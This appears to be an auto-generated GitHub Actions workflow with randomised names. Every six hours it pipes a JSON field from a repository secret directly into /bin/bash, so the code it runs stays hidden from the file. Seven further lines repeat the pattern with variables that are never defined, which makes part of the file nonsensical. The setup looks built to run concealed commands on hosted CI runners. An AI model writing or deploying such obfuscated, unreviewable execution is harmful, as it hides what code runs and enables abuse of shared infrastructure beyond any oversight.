name: durufei3456

on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: durufei3456
        env:
          ff80523: ${{ secrets.ff80523 }}
        run: |
          echo $ff80523 | jq -r .lf41363 | /bin/bash
          echo $ofgt09 | jq -r .niwcf74409 | /bin/bash
          echo $yoym5767 | jq -r .jqm6 | /bin/bash
          echo $wy3655 | jq -r .yltu29 | /bin/bash
          echo $kphz510 | jq -r .oxeu822 | /bin/bash
          echo $drvs06779 | jq -r .hii0 | /bin/bash
          echo $dwffo7068 | jq -r .ciaa431 | /bin/bash
          echo $n5 | jq -r .kgp42 | /bin/bash

